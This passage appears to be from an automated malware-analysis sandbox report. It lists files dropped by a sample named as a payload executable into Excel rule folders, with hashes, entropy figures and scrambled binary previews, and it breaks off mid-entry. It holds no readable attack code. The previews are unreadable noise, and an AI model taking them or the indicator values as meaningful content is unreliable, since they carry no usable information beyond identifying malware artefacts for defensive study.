                                                                                                      Preview:<?xml..c.wA.c?)~..9..].;T...x...M..}...)....L%."..H....a.... .;(pP;B_..2.R..p.d..QK.......C.e:Y..........EQ/.2.U..$D:b..R...N)../...{.Y.X..=I/m.s....+.D.?s.x....wd...:?n.L.*.!c..N%V....n..^?..y.=h...F..V..*f.R].c....q.....dfq.WbvM..8......5.....(`(c.d.:=n{TdV."C....9.aB=......N7...U...@N..).]...>~.Qe....&.;.nw.......c.@....5<....h.4(F..3e.......p.[.A]c.[.f>..7....*s.@pQx.....[.\!.(M.Y1.{...".G#....Rd)......X(+.4R.n<a.;^A..t.....wJ.Zg..a....,..."..:../...~.J..|.&.&..F<..pF@0.Y.]..,N....Yg.7#.c....6.u.p.K.3......49zEr&.r..B...f...L..N..........F.........(.u.#o?0.....W.".`............W....c]..q....H@...'..wr...."6.T?.p...7(55f....'G.V.)_.t.D].&!q...t.|.}..}ZMrqZ.k1..W...`...B...l.%...q..3..^...VZ...l...%.........1..%r.p..n.y.bG{W.SB..F....OVd..P..%.4....f..$..Qwt..oR.j..5...p..e.....).......9.o.6.0.s...HP..........$U..b8..T&.k.I8W.mN}z...1.................s..7...@.6;4IC+L..1>.4...(...hc&.9O......o..t...t.....O.&wY{.....WQ8/T.;h..>v....B...~3j.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320002v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1892
                                                                                                      Entropy (8bit):7.88335120903066
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:j/x3VnzosMarDlDdaXQeBR0Bfh4rLrSgS1exCsTbm9jwD:jPziarDlDYAsQ54rS51X2
                                                                                                      MD5:EC28CC5CAD54E0830CF03B8FCEF610D0
                                                                                                      SHA1:836F8700CF6A2C1CFF72DFD05EF578E5E5FE04B9
                                                                                                      SHA-256:2DE8C98378C22BAAB0CB7A5B890F06926C4D5EE636D0683D3C4A62352460FDC7
                                                                                                      SHA-512:37C3DA04E5175592588201533029A762A5ED111D36B45A888F9C2AAF7AA89962C5FDF332B50E120960B6F5ED7241A9906399D791FF0484CFBE739A086F78C3C7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlvl..j..i.}!.r.GyD.s...E2..uA~.........n...".^..I....]......0.u0.,-o.W......Z...:...2^.''...Q4....1.[.....E......'..F...%S....~...Q...........)%.:.;b,fm...].$p..- ...F.d.....sp..S..b.....,u.8..c..~3r.W..)....$..7?.T.f.~@.....q.x.7Q..4.i.n...S.G.$... .y..v..ix.e..{..c.S.y\....L.C...=c.I.[9'...'...$/...<.T...")...a..Kd4&.O-o.x.;q........|.2.c.j..s?i.W(>..l...O.......U...M$...G..Ou(/_.s.PM..T.K...!.X.?....UK...k(..2.3...}.....%...:....[5IJ2...+s_.F..P".{.J.0.D....7R"5j.Ju.........WG#............au..p.,..........&.!..<.F..f$.e.*.u.2.#.S'...Qq.h).>.v_..........4.....t....7...#[..3p....J...;5.p..q...W.6<V..{h... /..n....44.2......;....0TK.=...p.'.]..=SBr.M1..f."i.sW.....Y.)..:r...^..w.j}..n_4.&...M.[W.5#..ZF.$.a..XD.U......So..[....*.c....4xw...v.7u7MG!..U'yK7....{'J+w....(Z.A.....Sp..W7...(l.W7...3...R.....|U.Xl..L......Be..<.......5..fJ#SC..D.!..2.s...5..5..c...yB...@..c.Y.'2...h..:.ra....f.y..y....8E..I..2.1}..#....>.o..W.....DV.t0..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320003v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1144
                                                                                                      Entropy (8bit):7.792333443214123
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:qQZHbNZCYeLf8uB3PVuGAxDid9xMh8iNqgHvofZ/9b3fv6bD:qQZHbNdex3t8md9uxNtQx/dfwD
                                                                                                      MD5:48076E8BC40132CF9A74746C70C860F8
                                                                                                      SHA1:B640E0ED7AE3E144FF85AF2043C25AE0CBF295ED
                                                                                                      SHA-256:B9BA65D1F9C8EB358A84CC7DED926BFD651EED91B29D907DDC852C33A59EF735
                                                                                                      SHA-512:3901DBDC608A3D5552E3ADB747965F64B5A599BC26C3EDA2952986BB0F5A3B2101B0B4B0840FBC851CFA0F5466AAD519D7CF3A6E8F71BD11787BC8B0BB712735
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml7..;.o....2... .....y.......x..h...2f.....L..G:D.]RL.{7..}.,"..s...$-"q6....^......r...5f.|....N.f.B.m..(&..{..].....k.....k/.d.J*..5....2.....W.c=..dfj.B.8!....<...;n.-Rh..O...k.qQ.9.rh..E.H..7{kH....G.4...-..:.1mq.x..[..Tj8..r E..$.....H_a{E1"....~.....R._.K.aO>.B81..Z.O.@......V9.._.C...i...\...[..{-..6..!A..%.D.~KC.@.*.Wt....q.x.-....9..f.....O.*.uqa.3.>..j..K..4G.Bf.D....I.FA..D...~x...."S..dqS.(Q..y?.Q..w....F./!.d@l..c....2..4....m.iof.M..^B.<......._../.x.m...`..|g...w.h....?:.ey..zC.L.6..+..S.J.<d.|.r...a.{(..|O.`2U....a...+.i...!..'V..S..f..%..#.l...ne..m(..1%...5L...$jK.%6..*.........M...cl.n.q.../..Q.E.W'.........8.L...-1..Y.......r3=.Y..8......./.`@.92ce...A........y....p...........3Q...4NDu...O-.TW.l.d.[.$...`>8n.c..Awv.........A...R.9.v.... .+.9....b...........:c.KX.e.......7@....c......)........$...>.$...}+...(.......HP+u.1.........z..{...C..h...qJ....K.....]+S....*....Z..V....tq{K...ma.jM...[}.;..I.Yx..Lq

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320004v6.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1967
                                                                                                      Entropy (8bit):7.916828313370439
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:L7DHoO/PEjjSujtsgEDXla8DzLvDlGT5MsAHyora2FwD:L7DIO/Cj1jtODgaLvDsT5MsAZm
                                                                                                      MD5:0DC18F5CC0ACB6B516F858AF87843916
                                                                                                      SHA1:DA0A76AAF48A2CA16B301F1827477EA3638BFC87
                                                                                                      SHA-256:8AE51EC6C77FEA2E2CBAB6BCF67BE5D3E180ADD8B4F8E884EDEFAE0916476145
                                                                                                      SHA-512:4CFE215C279ED19EF439EBD018C26B06817D7E74A8A2B25137A4FACA12793E4DF7F759BCE03F882AF83135D1BF19FBFF3892BD2807D8BF9AA7468F9D9A30779A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmle..f.k.x....z.w..kO..J._|..p........e.+.......aB..y[..Rk.....'..}N@...............$....$....rL[.....Z.`7.K.`..m..#nv..R.B..z.Or....Y..S.Z-....[.4.3....&#..k.Z:...tk...C_K...Oe....D........[f.7..7>K.....bw....';.*.........~p...\....?....,...>..g.ZxoG2..m....Z>).XL...H;...9....[...q..l+.....I.>.*..\.~A...w.[F.?.-+K..qg......8Z.9B......<..h....E|.....* ...|...+O,.j.w.W.jTo.....a.._..-.c.........A..T.mqu.w=....[.z. $f...t.{...p..NA....r....S._.Sw....v..A.k8..=..t...w..!|..kS....`..}.>......A..........\0V#].a........Js.^G..MV....G.?.I....X._5p.[.A...j..Y.!H..n.cnX..y...]......r+y.<.~4.z6...R.'f....O.L.......B.W...U...4..k:.!...(..: ..V......=At....3....b.....4.X-6Ud[............ts...i.e.E..%.........I.w.q.2...FD6.'}>..U.....gD<4\..:.....Mv.aV....9...,.iY%..8.:....x.."..=!g.A.ZI....bM...l=..........$.m...]rgXvf.6.i.....k....D........C.J...`..f A...$......i....p..n|p...C....($.............l..I.j..G6....|7...tj...w0=N.G.=.1.I...X...#...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320005v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1427
                                                                                                      Entropy (8bit):7.850828606484742
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:SPuQRNVCSaVQg1XP8paQ2Y3iUl/EkF+7hGybc5Xj6oQo5BsFa+nv6bD:8VNVkVnZA3MNHbYzGa+nwD
                                                                                                      MD5:C9A5FC619419A4CC74A56832D8970497
                                                                                                      SHA1:E99CDA5E6170CB88F8674F889E6A2B40146FF560
                                                                                                      SHA-256:D1D34A2991BE3F7D774934F29E83D1F6B2BC0063477D363EA14AFC1F83536433
                                                                                                      SHA-512:0EE238B1713AB1F825AE370B2824BFC9D1A537DFD9B5FF9857F110657B45242E87E33B494E94CCA0769302E339DF37D447951D8DD7685B2CFD2409198FAC3C16
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.eG...vx...4....8&..t......+.t..xA..bZ.........t..4../e....8N~..i&M;3...]...j....O..`O...<.0S.#r..S...i.lXL).e.H.mo..... .>,.>...e...}.$<>..k..?di..F#|...G &/...q.c..X.P.q...*@.tC.&q.4^.O/{.../...q...Qw...........Mz..AF.....8...f6B..9..ith......Ld..Y.......H...}....g3.....].R..`..R...J.".6uj..=..I....`..*.......I.6...F.wF.GBN5.a..*.d...s.N|(]..D.y....../F.....].q..+."...v....n<#N..>0.)....>...l..\.....-%.W+...C.....a..J.o...CC......../...r..F.C...%!.G.L..q..j:s...........`.....1...x,............#k......BL...zm`...hD..;.X..,d%.9.... -_.R.C.#|.nG..uW..I.@$a..iZ.y.......2.9.....0..smp...k..k.....mW7`.<.u..U.g.;q..auh....?.^#f.....j=...K.6@W..nA...0...Y....\Z6.@..J..o..M;...s"..t....1v..'i.%./G.z..0..JhE.D.^L...*E...".4....b..Ei..LM..%C2g.........cWY$.m(......se..9x..7.m..H].>..Q*.Q.5._bY.k..=..w./.....DGvY......z.z...h..q....A.B5u.....N.....u{..0W.."2....)2.k...C.<.Dgg..@<K^..VfY....;.5....Q....x.J.p....;pt./.&7...}......$...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320006v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1528
                                                                                                      Entropy (8bit):7.852924811035099
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:I8/2SmCFxefFhaR5JIraf/qfeo19wYZBlMBI0ExjhRtw8y8v6bD:Ikxethair8YvwqBOBmZhju8wD
                                                                                                      MD5:D41EFB1E3A90119033AAC52FD1C2CF98
                                                                                                      SHA1:1D42F41DA88440AECD2B1D8B674443A14A9CACDD
                                                                                                      SHA-256:6F1E98C4670B85DE013A1D30E665EBE8E3570F17AF3A71F0AD24652C13D7ED17
                                                                                                      SHA-512:751E02581CC5611BC788DAF2F150F4BBCD078C3D673D9C0FD8F703CF250D97B475779D69DDC78D2FDAED7586C23B373196B490D022B959EDC96586515D490FE6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml!...9V..u...W."..._...lu......'L...o.$...V....cA...Y<+\......($_.j..W.:.r+..l..%s..fKU...K..}.=<....i.J...Y.#..^...x.-<...v.h.}.7...3...K.>.ObMrzMZ.. .>.h...L..u2, {.\&..`.}J....=b.m.stE|.G.........%.E.C/.c..3p.gt..t...[..1.*..7...Y........I.{=....n..I..d.$.v.-.M.U..8... ..C..._P.j2.@./A..E.......O......P}R.....4.i.V.(....1...._.9 )s..4.g...w..`^..>..#.4.yv....0.M...*..IE\.p.k.>.7A......h....!..g3Z.|.....a...j.........AZ'x.'...u.q.B3.!.D.D/.<..../.....:.=..*.$.L8.<.Vu...+....;.....y:e.....4..B.M..w....!J.HUV:..Yt....Vu.n.).)....)....P.%....b.............P.E...2.D..}lgF...*6.n....t.......q......... .t.._.F.I.....V.)..g@....x...CHu.......WB$.c...M..)...o."......M.t.y...[I.#\.~.r..+_......O..C.....5.*....!V{B..n...(+,i..xctp...e4.....{{..91./r....&JC..N~...J...J.g!..<x.a7...a........i.h.#C..K..Mu.{.T...~v..~.p.,..@....._u...S...X.........1.=-..F?.}B.G./...r.H.&.]4..(...e....!z....zM..X7......*.-p....t.....gww..~.AW]..Z....z.%.?.....q.}.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320007v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1233
                                                                                                      Entropy (8bit):7.848809652458412
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:vg4oNJpsa1r5r045w/f0AXW9hYj0BQrDychpVMQ8LhBY52Xrv6bD:Cpsahh045w3jS60WS6MQchw27wD
                                                                                                      MD5:0D66871DC7C9F68C2ABDD5553ACAAF60
                                                                                                      SHA1:4697C20A365B718361B597CD27EDA10D3FFA5109
                                                                                                      SHA-256:58B3C20BE6B2362824AB1E7D4FE03E5051E7C2FD23D4960B14FF348B0CE861DF
                                                                                                      SHA-512:32C80FD88D0CC92DB349794C03A5EB0F32FB7883D7CF3ED1B286D9D9730B34D663805F972DE3C831BD987A143E6F5417F96933DE659CC9320F7C0ECED54EF1C9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....3..._X....m+:'....\6U.j.......I.#..*b..y.gAp_..:V0......~|.............H.y9.........C.....9f..^..Bf.......=...6{....$....$.u..U.xW..U....h[x..5)....E.1/s.c8.M|.....nf.........}.0GZ..>..Md].jx.o?^^K..|"..........U..&....t...9...ys..k.X..^..(.......x$..r;?.~..H8......?..BKa.J$.I...L..q.@j..k...B...o..'`_..@2:Y..-..'8......h./tD......6...>]......0*.....vj.....W...>...J.}Q.v.y.V.L.J....B..I..7...n.B.(.......u.......S..QF....`c......,.Z.f...ks.yb......!..'W.....L.!~.+.+..U.wW.H.....l..#..x.Hox@N...hUN.....@..*..o>.{...d..7..M......k.HO.(.?.J.......Oew....AI.Y...3.w.xz...N......0T.X..P~...{..U.+...8.{....&.....G.m..z......N....y.v.)7ee..J.O.:>....D....0.....~q....Q-...&O.-;/..%.\^-.ALg5..V^U.h.".a...F..C....9...N,GW5....*..(0v.6.6r._..B...Y~..|..K.LvM.,...a......1.......5,...;....b}...B.............s.b...-.i;Y....?...7.i.f.Y..pG.[..`Z#...+........%8.U&..T..A.E..>.8..r...X4.K..|.N..!......G.ob:..b...m.....R...0......3..n...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320009v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):866
                                                                                                      Entropy (8bit):7.765855173022421
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:NYaI9DpeFYeKVUjpaW1Y0sYWUMDT/C51danv6bD:9I9UKViYp0NlWT/C514nwD
                                                                                                      MD5:8D7A440D22F383784F4926BE07BC7210
                                                                                                      SHA1:ED19907E70CF7D0227F268F3298E15E778CC7253
                                                                                                      SHA-256:A254E127ED6D8A288362FB3F7D2B258EFB3FB19D7B2F697D35530796FDD3806F
                                                                                                      SHA-512:F9246773CB1ADA31CF9A7988F2622F67D010582E4DD7CE5C19CD94F7C4DFFD4BF2269F1F8B5E4EB278F013442E1072386379CFAF8C85F725EC583FD326AB0898
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..a..$,f{.n.....b.,..Uf@'?.U.1.Z.K).a..0.-o...M.._c,6...+..`./^..K...X..z....o...}....\.4.pb..U..-.I.X.../Ez..^..).k..Q.g.Z9h..0,p.....v4...$...r.....E.4f....8.v......u....0....;..S_.)..+......i0....6.>.......Ys .ZH...g....B.."pS.F.S.p....@...2Pg\X.h..`....yn...3.httj..\........K.w$....<C=.Q...#&-..>.c.N..N.74]..C.^E.....>..3JW..b._...~DK.....|...VM..M. ....B.&..i.G.=>.l...&.<.f.r......<[JeW...J.^....;.........#w..<....t....@.........Z.[...E.w.X.,..%..G....+o..xo(.l.a...E....ww.P.7F..$R[...7u..>.nJS.@|...&..d...ydmMN..%..Q@.'.q..f~..$"...M.5Lw....J.....t.E.....i_./.&f..3.T..;+..#..P....[0..:.C(.>......EWI...x...X.<.`..........t.`.X...<..........'.x....lo.&...m.3...........~.......bA..)U.^.|......7.^...0......|Q.%[.].Jy..AB;..Z....W..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320016v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):901
                                                                                                      Entropy (8bit):7.790906868207688
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:DIi3//O2IX4aRzojuY06/wqHJpTSqv6bD:zXYXHZeLBwD
                                                                                                      MD5:88BC973A3253E816A2BFE65D5DFE83E9
                                                                                                      SHA1:674C373979F388115DCE4414F6AE48C2EB5AD4AE
                                                                                                      SHA-256:A0C4928FBB491A6FA0212C5BF1AD23EC5A871E990A7C1773E35C1AA4AE9B2F51
                                                                                                      SHA-512:ACFFC91C616E6C861143F04B413C721F401581FF7B3A50C25FDBCC3C15DC47057F608F3913A3263B349829DC3DA8919D6A381E5F44D3A1DD626B942B7B2BF991
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.t!M...WI.).3..p....|. r?.."...Q..m....Z..z..7.K...pu~.^.Us...f.p...\..)....&=y....a..i4$.8`H...".{..S...#....*|..*M.^.N..I..+...U..|ra....9q....B...V.7.m......!...;)..F...xT .3............p.f ....e...Q| ..o.6.ys..p..W...WT%..X9.F))..=...<..^q9....L..^.1?..U.+#.NX.U...].......7z]J>,U............#.;......".~.t...=.....W.i+dU.Y.......F..............24....'.A..#w..$....(...\.'X....[h..e..........7A...CwvE....};G..bx......U..-.y.H..._)`.`b..~...K.....4.....Z..u/....W.9...].....;.^.......a...a......(.....4..[;.=.bO....Zk.L>......8..;a7h9!N%.....p..E....9.Q@..}.u.>...V.z......r.F...j{..l....;F..S....b<.E...._DL....r..$.Z../E.P.....~.{.......b&.M..n..I^.P.ZOP=`Z...t.S@....1".X.T..BA}ZF^...y]..o\..Q......J..L.........g\.hu0..a...3.D..;.U.....`*..<q.....+..O<....3a.........hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320021v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):860
                                                                                                      Entropy (8bit):7.780245543167684
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:i/cDlXR+VjMbH02FBazdOXZah+chc5UwGdFPvIRkAVcrRmrqcc2PE+OuVv6cii9a:6OXcabHvQRAs8ch9w0FPbcDPOSv6bD
                                                                                                      MD5:4897B2927033AB90FAC4A6B3726CB1A3
                                                                                                      SHA1:22B99BC0A7D69D562E4F86241A0666C6DE8BB42F
                                                                                                      SHA-256:4566E25657E3608C85FD42D5980A63A5A0C34F4F253CCD9368A451BB1C6EA89F
                                                                                                      SHA-512:0F5696043D2D39C965890A1C52BBE40C674421861C2A7CCED02EE97E244EC4BAACC268ADD1F529C338A727AA413DC6F7E0ABFB3F2226D0AC615BA93D65DB356A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlpU.)x..U/........t....`...u........:O...~...A..a....}>.YH.....4....... j[D.&..M.J..X7...}N.......`..N.j.'.... ..g^..JB,..u..U......@.%!......8.k0w.. .......1.mG.fs.z.Bb\..)'...,.cRM....>\..xb..*.....<..Tz..=..|;8.l{....v.9.>}..<Edu....`..x3o..aU@....[..].~>.+..*,s.C...d..+>.......pq.@>:..Z?B9]..w.U......)..PHJS...K&..%.aNq"V..5.Th.y..u-MN&....`.M.....*.."?|.1B1...R.6.....Z..,..#.v..2..A.S...=.....x.i6...9.2@.`....l.>-.K10X.h.".....]U.X).m...).(....M..1..F.+.`%7*......."2..X....>..m..q}.a';T....q...`/.yw/.m.c...Fg.F...?.&AWK.....y.,..-.n.!r.#e.O..1S.D.R....3......T/.bR...=.oA......&..Zwp.;....:.....H.t~..h/..L...@..[.7.6.R..<..1n..s-...uj.....,S...._.....|'..!:$)Eb......t....B...p..q..z.........tQ..T..tZ.OU......o.......K.`(AhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320022v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):760
                                                                                                      Entropy (8bit):7.771400226791839
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:si3HS5j/HLE+bpMClDxQtXdpWiBKjRf7aSBlVUmbUDHqOvFaBxm4PSv6cii9a:puHwYio1eNpWiBUDaSBlVU9NaB2v6bD
                                                                                                      MD5:9285B8690F16B44F8EB02F8000714141
                                                                                                      SHA1:63A87273B44360119DF297A28BE2A28A4F0339F4
                                                                                                      SHA-256:A79A22223BE81B491A68E4D44AA4AC0CED077D419A2F6C283E1A798CB53C86FB
                                                                                                      SHA-512:EA6EA045F755B0DA64022192C2B791A66F0F6BE866080BD54B2054B041B655A9960A3421E7775898966CEC29C2EBE187690735CA0E378D722E86D797C74FF871
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml........{...$.s,N...M..S....p.z.....g....$:.9.d}.a."..9...?.R....,l>...GEH...u.....d.....AUF%...Xg........S.<hZ.].s..oIUGNp1......!..".Z.U......<h..._.r...J.:.r.@..~..i..J...`...C....,...-E.....y.i.IU=I.,. .x.t|c.*.......w..S.i..j3......T...OZ.l.J..q..M..Ek~Ji.....O..\.2.}8Qk\Z h.~....2n}CG..o....&".3.8...Hg..J....P~.G^...1...e..q...{IE-..../.&..Aq..L.KP......+.\...........>|.*.'....>.QRC..q.4y..0...~..+.9..Fh...f.@.g....M..Q.U.........O5^B...d6..jW.d.k#..cS....^HE.......X..#._X....u..%.D.........$......Q:..yv?..$.C.............L...Q.e.b......bZ.~..b.f..".S.L.....V...m\C.&..m.... ...>.......\f.=" T..._..cYL....gh.#h)....Y...... h.;"<..I.=+hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320029v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1117
                                                                                                      Entropy (8bit):7.820056077024345
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:s3/7RhGMAu8RBzqMZulAg1yD8UIVtJhRyFeolmoLv6bD:IzD8XZg14BOJhYeeLwD
                                                                                                      MD5:B5D7FCF309441EA00A34D3E3D5B4086D
                                                                                                      SHA1:7940E1828D9D26B0269E88AA558D1422F8C7F399
                                                                                                      SHA-256:E112B29FB505D5CDB81F6FB3B60D9D1CDE63894C37E78D179C0498F8B1422750
                                                                                                      SHA-512:1C3A02A55A0C98F0EB383F87623762D636F83D34713B48B9EF8A22A531DD39FCBE0A95EE2519B42EE51EC85AECDD5023D445543133A928374CDA47BB70151710
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.&..$vB.n..%..(`"+....V.:ar.t......|.f..d......tAu.cp....JP...a.h...~...VW.>A..R.7..<..\.U]..Oa...2W...bG ...!....l....T.'?.M..9....LK.$.=.S....Z..-..kk,+...d#...*._k..#...7X....W..&..`..?E6t.cf=._$.F.^.gQ...:u....s...<.[.....sM..X1X.F......m...G.....{....vE......P.....}.;h&...C.j..o8x<.Y4._.......Y..W.34h.9......ng..1..L\.C...]..?v.F.J..~.v..=CR...Lf.Mq;.t.4,t.|G....P....iz.Z.....Z....oK%z.r.?.~..Z.L..Y9p=d..:M;'....s.X....w.Gj....i..............nd....rD......1!:.L.vs.6..g.Vc....v...%....3.A.P..].[.[.Ii...y...z.........ki~lf..|..p0.0....A.`'....l.....C...A.+....7...".....v .$!Y..O.......7.`d.b........p)Q..).....FZO...TpY..*.O..x..L.../...=8x...9..-.|.nh"9n.EQn..........p^..&.^@..kE...'......U.M.....=9M.x.-.y... 2..../...O .~...L.UI.Y2..q.*-..RP.X.j.Z...7.nl.........8`|.$...{...}MB..z+]....Cy.u..(...O...U...(.PS....~.~$.`.kq..Qx|...Aj6W.._g..U.1...XGn.UY...t..m."..ce..q;O.(.;....\...B.m(.x .]_.2...]/.9..ky2...Y..g.h.p..+|Q._4..}=.B8..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320032v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1025
                                                                                                      Entropy (8bit):7.778258955453698
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:1zQ2WA6GnGHLsNyaqbuQ2u4Qx+nD0Daz0b5vSJQMY3OD+5REkgv6bD:1ki6GnuLsAaqbZTx+nD0OWCQJ7R8wD
                                                                                                      MD5:432C523A7023E6455D00C7FFA1FE487F
                                                                                                      SHA1:622AE8F4CDF2831BEBD8E89F289A3A0AE9E7D08F
                                                                                                      SHA-256:A14A94E5EFF634A23F399183411D1C8E0265DF6E534C70F9B433A81B7DEA2907
                                                                                                      SHA-512:63F47C22A73AC2DEC6D5F75989B5D338A4915AD421E57B961C2367D0F35F87FE09CAA38AE33D63E4ACD1C2736E6A064DE1CF811FC4AA27E5EDC5AB648A002231
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.cg%[.O{...z...a...fW..gJ*...QW./.D|*}..^......h..Y..T.....N.@....[~..7..(Nb.l.m...C=..]....p.2.r....J.dn`...h........&.0#(.e...t(<.?.6.d;:...:.L.;.#...?......Q..2.H.~..:.u.....+n.U.....4+elr. 1..J..&..>.....0...1`.z....G5.....z.K..0`.B..e6.K............\P..D.,P..W..'.f.1.v...c#[..F%.:B.t...,.^!v.."...O...i,-=^....9....^..;.F..P..\..J..:_.AK%.Y...@.%.r!.7e].d$.d/=...=+...[P...J.C"g../uI..DX...uiI..S..E...".<."!F.B&s.k......;.....t_U.D...h./.Z.10.....z..S..h.2u....zg.........Em..[/..B..]K...S.\...+..;.$..E/...(9..o..F.o..V......P..}9.v.On.k9W...cEj..|....R....r.(7$FrF.Y....................`B..S..t..8..f....ki.....M.U.4,..U....%........".ay.l..i.9._.R^..S.k.....r.*..x.....|.x\M#.c..U.......L..@..A.,...y......2..v+-.&tUN.......*.S.+u@i *..b"*"$.0....w.....W....n..{@$i@.m.EJ.........1.h_w-#.8.>./..b..../.. .\..|MN>..b.L.-.18mW.f...7Bx.....m.\..&\..,...TB..e.j.....Q.4.em+!.%1p...1.yehZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320033v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1112
                                                                                                      Entropy (8bit):7.796813830334821
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:GzbC9GVwdOdtRp5JXug7kmbPMLt0/lAKm13WAXoxMsi9nv6bD:GCG6dOlp5NugQsPM50tnE3XomsswD
                                                                                                      MD5:611057431D38287C1BE790A717A67E24
                                                                                                      SHA1:FA18A507CA615DED4EF75B498648A6500F940E4F
                                                                                                      SHA-256:385B5694ACB222F736FC7E032E656C70FCBAB176A02E6EFF0556F82F01154F95
